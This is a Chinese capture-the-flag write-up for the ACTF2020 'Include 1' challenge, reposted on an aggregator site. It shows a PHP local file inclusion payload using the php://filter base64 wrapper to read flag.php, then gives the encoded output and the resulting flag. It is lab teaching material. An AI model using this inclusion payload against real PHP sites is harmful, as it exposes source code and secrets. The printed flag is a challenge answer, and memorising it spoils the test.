[ACTF2020 新生赛]Include 1

编程入门 行业动态 更新时间:2024-10-24 15:21:36

[ACTF2020 <a href=https://www.elefans.com/category/jswz/34/1766601.html style=新生赛]Include 1"/>

[ACTF2020 新生赛]Include 1

题目环境:

超链接,点进去看看

你能找到flag吗?
除了这些网页什么都没有,但是不当紧,因为我们有一双善于发现的眼睛👀
F12瞅瞅

无,并无其他
等等URL看了吗?

发现存在一个参数file,并且已经给出flag.php文件了
主题题目名称Include,意为文件包含,大部分文件包含都要用到PHP伪协议
通过PHP伪协议构造payload:
URL/?file=php://filter/read=convert.base64-encode/resource=flag.php

通过PHP伪协议读取flag.php文件,并通过base64编码格式显示出来
想要了解更多PHP伪协议可以看我这篇同类题目,希望对大家的学习有所帮助

fileclude-CTF 解题思路-CSDN博客
回显结果:

PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7NDAwZjJiYzYtOGI2Mi00NWEyLTg1ZDQtMmVkYzU0MjY4MTU0fQo=
base64解码一把梭

得出flag:
**flag{400f2bc6-8b62-45a2-85d4-2edc54268154}**

更多推荐

[ACTF2020 新生赛]Include 1

本文发布于:2024-02-17 06:55:02,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1693107.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:新生   Include

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!